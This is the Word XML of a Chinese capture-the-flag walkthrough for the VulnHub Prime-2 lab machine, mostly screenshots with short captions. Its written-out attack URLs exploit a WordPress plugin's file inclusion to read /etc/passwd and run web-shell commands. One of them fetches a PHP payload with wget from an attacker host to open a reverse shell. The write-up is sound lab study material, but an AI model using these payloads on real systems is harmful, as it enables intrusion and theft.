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512C1" w14:textId="090B6A4F" w:rsidR="0075386D" w:rsidRDefault="00F8396B">
      <w:r w:rsidRPr="00F8396B">
        <w:t>Prime-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E67D4" w14:textId="269BB48C" w:rsidR="00F8396B" w:rsidRDefault="00F8396B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00D664C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.vulnhub.com/entry/prime-2021-2,696/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A23934F" w14:textId="77777777" w:rsidR="00F8396B" w:rsidRDefault="00F8396B"/>
    <w:p w14:paraId="094BD270" w14:textId="77777777" w:rsidR="00F8396B" w:rsidRDefault="00F8396B"/>
    <w:p w14:paraId="489258A3" w14:textId="4781B41D" w:rsidR="00F8396B" w:rsidRDefault="00F8396B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A3057C" w14:textId="65536D91" w:rsidR="00F8396B" w:rsidRDefault="00F8396B">
      <w:r w:rsidRPr="00F8396B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C9F35D5" wp14:editId="12E10446">
            <wp:extent cx="5136325" cy="3436918"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1874956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9561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11EF" w14:textId="4600C3E0" w:rsidR="00F8396B" w:rsidRDefault="00F8396B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标1</w:t>
      </w:r>
      <w:r>
        <w:t>45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB05AF" w14:textId="27E35072" w:rsidR="00F8396B" w:rsidRDefault="00F8396B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394ADA2D" w14:textId="2D7C1FFF" w:rsidR="00F8396B" w:rsidRDefault="00F8396B">
      <w:r w:rsidRPr="00F8396B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DE43FD9" wp14:editId="087222E1">
            <wp:extent cx="5258256" cy="2491956"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1527600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00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17DC" w14:textId="46B51082" w:rsidR="00F8396B" w:rsidRDefault="00F8396B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口服务扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61496729" w14:textId="51972982" w:rsidR="00F8396B" w:rsidRDefault="009C5028">
      <w:r w:rsidRPr="009C5028">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F203067" wp14:editId="1C941271">
            <wp:extent cx="5274310" cy="2735580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="265734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345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D920" w14:textId="0088F160" w:rsidR="009C5028" w:rsidRDefault="009C5028">
      <w:r w:rsidRPr="009C5028">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20A0AF6B" wp14:editId="37D161DD">
            <wp:extent cx="5274310" cy="2026285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1036997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97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DE94" w14:textId="5F2A837E" w:rsidR="009C5028" w:rsidRDefault="009C5028">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0792D406" w14:textId="3ACEE03A" w:rsidR="009C5028" w:rsidRDefault="009C5028">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C5028">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D7CF314" wp14:editId="01EF8925">
            <wp:extent cx="5274310" cy="2506980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1594112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EFF2" w14:textId="6A5742B7" w:rsidR="009C5028" w:rsidRDefault="009C5028">
      <w:r w:rsidRPr="009C5028">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30A766E9" wp14:editId="5C9212C0">
            <wp:extent cx="5274310" cy="3750310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="657491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910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19D7" w14:textId="14AA9736" w:rsidR="009C5028" w:rsidRDefault="009C5028">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先去看一下8</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7BDDBF" w14:textId="78F0D1F1" w:rsidR="009C5028" w:rsidRDefault="009C5028">
      <w:r w:rsidRPr="009C5028">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49B30C2D" wp14:editId="2A02196C">
            <wp:extent cx="5274310" cy="3630930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1706712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12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4E3E" w14:textId="77F914D9" w:rsidR="009C5028" w:rsidRDefault="00CC068C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E79524A" w14:textId="7B78FA5F" w:rsidR="00CC068C" w:rsidRDefault="00CC068C">
      <w:r w:rsidRPr="00CC068C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B2A0845" wp14:editId="1B805376">
            <wp:extent cx="5274310" cy="3792855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6403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B51C" w14:textId="59C78F01" w:rsidR="00CC068C" w:rsidRDefault="00CC068C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现点不一样的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6196D1F9" w14:textId="6ADEDD9A" w:rsidR="00CC068C" w:rsidRDefault="00CC068C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A269C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（记住还是要用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A269C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A269C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B74513" w14:textId="2B3D2E17" w:rsidR="00A269C2" w:rsidRDefault="00DE56B3">
      <w:r w:rsidRPr="00DE56B3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C73453E" wp14:editId="73DE1E4C">
            <wp:extent cx="5274310" cy="4464685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="276316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16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9175" w14:textId="14F11B92" w:rsidR="00CC068C" w:rsidRDefault="00DE56B3">
      <w:r w:rsidRPr="00DE56B3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18CB4008" wp14:editId="3E8682B0">
            <wp:extent cx="5274310" cy="2693670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="134253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3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5CC8" w14:textId="3FECDAD6" w:rsidR="00DE56B3" w:rsidRDefault="00DE56B3">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>好洞出来</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>了看看利用方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56658FA6" w14:textId="628B135A" w:rsidR="00DE56B3" w:rsidRDefault="0067505A">
      <w:r w:rsidRPr="0067505A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C724D0C" wp14:editId="6A08CFED">
            <wp:extent cx="5274310" cy="4494530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="17634604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60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BA98" w14:textId="7A47780D" w:rsidR="0067505A" w:rsidRDefault="0067505A">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&amp;cfg</w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>=..</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>/../../../../../../../../../etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73C6E8B5" w14:textId="47A90B16" w:rsidR="0067505A" w:rsidRDefault="0067505A">
      <w:r w:rsidRPr="0067505A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B1B1DA4" wp14:editId="4E1E502B">
            <wp:extent cx="5274310" cy="1364615"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="461989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890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84EE" w14:textId="2BCE4F02" w:rsidR="0067505A" w:rsidRDefault="0067505A">
      <w:r>
        <w:t>成了，这边没什么线索了。去另外一个web看看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A61AD4" w14:textId="45CCA118" w:rsidR="0067505A" w:rsidRDefault="000C201B">
      <w:r w:rsidRPr="000C201B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="564CE511" wp14:editId="5EFCA4BA">
            <wp:extent cx="3787468" cy="3718882"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="71675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501" w14:textId="707A57C8" w:rsidR="000C201B" w:rsidRDefault="000C201B">
      <w:r>
        <w:t>看看文件一个一个看吧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A1AD4" w14:textId="2DF7B661" w:rsidR="000C201B" w:rsidRDefault="000C201B">
      <w:r w:rsidRPr="000C201B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="131C6402" wp14:editId="4335601E">
            <wp:extent cx="4915326" cy="1546994"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="80714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45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D251" w14:textId="10347825" w:rsidR="000C201B" w:rsidRDefault="000C201B">
      <w:r w:rsidRPr="000C201B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47F1DC50" wp14:editId="249DBDBC">
            <wp:extent cx="2705334" cy="1767993"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1292786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86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94CA" w14:textId="3AFD0051" w:rsidR="000C201B" w:rsidRDefault="000C201B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在uploads里面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414CD7A9" w14:textId="52272565" w:rsidR="000C201B" w:rsidRDefault="000C201B">
      <w:r w:rsidRPr="000C201B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42D27DB7" wp14:editId="202DB025">
            <wp:extent cx="4595258" cy="1607959"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1443763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63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4B0D" w14:textId="0ABC0B9E" w:rsidR="000C201B" w:rsidRDefault="000C201B">
      <w:r w:rsidRPr="000C201B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B1673A7" wp14:editId="2C96A1C5">
            <wp:extent cx="5274310" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1421405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05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3CA3" w14:textId="4E156465" w:rsidR="000C201B" w:rsidRDefault="007F32CB">
      <w:r>
        <w:t>一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660BAC78" w14:textId="7A938F6B" w:rsidR="007F32CB" w:rsidRDefault="007F32CB">
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&amp;cfg=../../../../../../../../../../home//jarves/upload/shell.php&amp;cmd=whoami</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007F32CB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D9E1E1A" wp14:editId="427AC461">
            <wp:extent cx="5274310" cy="842645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="64588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8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C4C0" w14:textId="637B5FEF" w:rsidR="007F32CB" w:rsidRDefault="007F32CB">
      <w:r>
        <w:t>反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C324954" w14:textId="42E75071" w:rsidR="007F32CB" w:rsidRDefault="00D35B3F">
      <w:r w:rsidRPr="00D35B3F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F05C99B" wp14:editId="14B27D91">
            <wp:extent cx="5274310" cy="3710940"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="568978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786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36DF" w14:textId="29D8CE11" w:rsidR="00D35B3F" w:rsidRDefault="00D35B3F">
      <w:r w:rsidRPr="00D35B3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D661B7E" wp14:editId="5139AF40">
            <wp:extent cx="4854361" cy="1196444"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="834491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91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4EAF" w14:textId="5FE90733" w:rsidR="00D35B3F" w:rsidRDefault="00D35B3F">
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00D664C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&amp;cfg=../../../../../../../../../../home//jarves/upload/shell.php&amp;cmd=wget%20http://192.168.21.131:8000/1.php%20-O%20/tmp/1.php</w:t>
        </w:r>
        <w:r w:rsidRPr="00D664C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F3BE989" wp14:editId="287AF60D">
              <wp:extent cx="5274310" cy="1002665"/>
              <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
              <wp:docPr id="1878744036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78744036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10026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B6086E0" w14:textId="57AB3E76" w:rsidR="00D35B3F" w:rsidRDefault="00D35B3F">
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&amp;cfg=../../../../../../../../../../home//jarves/upload/shell.php&amp;cmd=cat /tmp/1.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27579DC9" w14:textId="674CE72F" w:rsidR="00D35B3F" w:rsidRPr="00D35B3F" w:rsidRDefault="00D35B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>写入成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276DBD86" w14:textId="056C2FB7" w:rsidR="00D35B3F" w:rsidRDefault="00D35B3F">
      <w:r w:rsidRPr="00D35B3F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="226F2253" wp14:editId="0C42B7CE">
            <wp:extent cx="5274310" cy="1238885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="191245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50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2D89" w14:textId="03C6D7F3" w:rsidR="00D35B3F" w:rsidRDefault="00D35B3F">
      <w:r>
        <w:t>包含shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0152C7DD" w14:textId="5D344426" w:rsidR="0090350A" w:rsidRDefault="0090350A">
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>192.168.21.145/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&amp;cfg=../../../../../../../../../../tmp/1.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="724BBFBE" w14:textId="08FD3365" w:rsidR="00D35B3F" w:rsidRDefault="0090350A">
      <w:r w:rsidRPr="0090350A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74A96C3A" wp14:editId="68852EDC">
            <wp:extent cx="5274310" cy="1022985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1344047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475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A59E" w14:textId="487BD5DB" w:rsidR="0090350A" w:rsidRDefault="0090350A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去看一下，一直没用，肯定有用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000C93B3" w14:textId="2D9427D0" w:rsidR="0090350A" w:rsidRDefault="0090350A">
      <w:r w:rsidRPr="0090350A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27C81A73" wp14:editId="7886C4AB">
            <wp:extent cx="5274310" cy="3793490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="851896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960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44DE" w14:textId="552EBE67" w:rsidR="0090350A" w:rsidRDefault="0090350A">
      <w:r w:rsidRPr="0090350A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D4B600A" wp14:editId="1A3CD805">
            <wp:extent cx="5274310" cy="5779770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="376784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849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16E6" w14:textId="326DECEC" w:rsidR="0090350A" w:rsidRDefault="0090350A">
      <w:r w:rsidRPr="0090350A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E26EC32" wp14:editId="763FFCCF">
            <wp:extent cx="2469094" cy="289585"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="2040736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364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89B7" w14:textId="4A00FBA9" w:rsidR="0090350A" w:rsidRDefault="0090350A">
      <w:r>
        <w:t>连</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB3871C" w14:textId="211EFCDF" w:rsidR="0090350A" w:rsidRDefault="00703D9B">
      <w:r w:rsidRPr="00703D9B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CD7C071" wp14:editId="3BFE8931">
            <wp:extent cx="3901778" cy="944962"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="109932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26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0374" w14:textId="018A9547" w:rsidR="00703D9B" w:rsidRDefault="00703D9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接ssh密钥生成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E72B70B" w14:textId="09DC0640" w:rsidR="00703D9B" w:rsidRDefault="002D74EA">
      <w:r w:rsidRPr="002D74EA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58E884B7" wp14:editId="6B38348C">
            <wp:extent cx="4640982" cy="3452159"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1021447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4719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07BF" w14:textId="03CBB84B" w:rsidR="002D74EA" w:rsidRDefault="002D74EA">
      <w:r w:rsidRPr="002D74EA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3969C341" wp14:editId="773632DE">
            <wp:extent cx="5274310" cy="577850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="880872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729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9114" w14:textId="3B50A913" w:rsidR="002D74EA" w:rsidRDefault="002D74EA" w:rsidP="002D74EA">
      <w:r w:rsidRPr="002D74EA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20730922" wp14:editId="0719D59B">
            <wp:extent cx="5274310" cy="234315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1786651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510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C16" w14:textId="3505B8BA" w:rsidR="002D74EA" w:rsidRDefault="002D74EA" w:rsidP="002D74EA">
      <w:r>
        <w:t>远程登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D07C0E" w14:textId="0C668917" w:rsidR="002D74EA" w:rsidRDefault="002D74EA" w:rsidP="002D74EA">
      <w:r w:rsidRPr="002D74EA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54A5EA3B" wp14:editId="0560DE84">
            <wp:extent cx="5274310" cy="4712970"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1019495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958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5604" w14:textId="65321CB4" w:rsidR="002D74EA" w:rsidRDefault="002D74EA" w:rsidP="002D74EA">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>免密登入</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F7DE1" w14:textId="6C2439B5" w:rsidR="002D74EA" w:rsidRDefault="002D74EA" w:rsidP="002D74EA">
      <w:r w:rsidRPr="002D74EA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44C6D8C7" wp14:editId="301A45F1">
            <wp:extent cx="5274310" cy="1590040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="269989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898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B1DC" w14:textId="4FAEE893" w:rsidR="002D74EA" w:rsidRDefault="0087407A" w:rsidP="002D74EA">
      <w:r w:rsidRPr="0087407A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="041D347C" wp14:editId="30BBFD89">
            <wp:extent cx="5274310" cy="1534795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="563117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172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56AC" w14:textId="3EDEDB54" w:rsidR="0087407A" w:rsidRDefault="0087407A" w:rsidP="002D74EA">
      <w:r>
        <w:t>啥也没有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E0D76B" w14:textId="02561DDD" w:rsidR="0087407A" w:rsidRDefault="00442661" w:rsidP="002D74EA">
      <w:r w:rsidRPr="00442661">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CC445DB" wp14:editId="442D2162">
            <wp:extent cx="5274310" cy="5292725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1162250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503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3079" w14:textId="5D0BF394" w:rsidR="00442661" w:rsidRDefault="00442661" w:rsidP="002D74EA">
      <w:r w:rsidRPr="00442661">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E8C6CE1" wp14:editId="3334B951">
            <wp:extent cx="5274310" cy="2797175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="941255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55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E3C8" w14:textId="0CF15A0F" w:rsidR="00442661" w:rsidRDefault="00442661" w:rsidP="002D74EA">
      <w:r>
        <w:t>构建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26146E6D" w14:textId="1E26869E" w:rsidR="00442661" w:rsidRDefault="00442661" w:rsidP="002D74EA">
      <w:r>
        <w:t>新的文件</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>上传就可以</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7819D348" w14:textId="168EA152" w:rsidR="00442661" w:rsidRDefault="00442661" w:rsidP="002D74EA">
      <w:r w:rsidRPr="00442661">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78CF905E" wp14:editId="180713F6">
            <wp:extent cx="5274310" cy="822960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1206459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599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7DD3" w14:textId="029C4A11" w:rsidR="00442661" w:rsidRDefault="00442661" w:rsidP="002D74EA">
      <w:r w:rsidRPr="00442661">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40D22540" wp14:editId="4465572F">
            <wp:extent cx="5274310" cy="425450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1839403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0394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0EFE" w14:textId="4945F32B" w:rsidR="00442661" w:rsidRDefault="00442661" w:rsidP="002D74EA">
      <w:r w:rsidRPr="00442661">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B8E9FA6" wp14:editId="24FB6BFB">
            <wp:extent cx="5274310" cy="1057910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1242695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955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50F3" w14:textId="032C6D0F" w:rsidR="00442661" w:rsidRDefault="00442661" w:rsidP="002D74EA">
      <w:r>
        <w:t>进容器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42809052" w14:textId="5B3673AF" w:rsidR="00442661" w:rsidRDefault="000376E1" w:rsidP="002D74EA">
      <w:r w:rsidRPr="000376E1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5300E61A" wp14:editId="382A82CD">
            <wp:extent cx="5274310" cy="1562735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="880151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15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94B1" w14:textId="34E9C7FD" w:rsidR="000376E1" w:rsidRDefault="000376E1" w:rsidP="002D74EA">
      <w:r w:rsidRPr="000376E1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07AA15F2" wp14:editId="026A5CE1">
            <wp:extent cx="5274310" cy="622935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1311040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406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001F" w14:textId="79C28F35" w:rsidR="000376E1" w:rsidRDefault="000376E1" w:rsidP="002D74EA">
      <w:r>
        <w:t>结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF3898" w14:textId="77777777" w:rsidR="000376E1" w:rsidRPr="00D35B3F" w:rsidRDefault="000376E1" w:rsidP="002D74EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000376E1" w:rsidRPr="00D35B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BBC"/>
    <w:rsid w:val="000376E1"/>
    <w:rsid w:val="000C201B"/>
    <w:rsid w:val="002D74EA"/>
    <w:rsid w:val="003D4BBC"/>
    <w:rsid w:val="00442661"/>
    <w:rsid w:val="0067505A"/>
    <w:rsid w:val="00703D9B"/>
    <w:rsid w:val="0075386D"/>
    <w:rsid w:val="007F32CB"/>
    <w:rsid w:val="0087407A"/>
    <w:rsid w:val="0090350A"/>
    <w:rsid w:val="009C5028"/>
    <w:rsid w:val="00A269C2"/>
    <w:rsid w:val="00CC068C"/>
    <w:rsid w:val="00D35B3F"/>
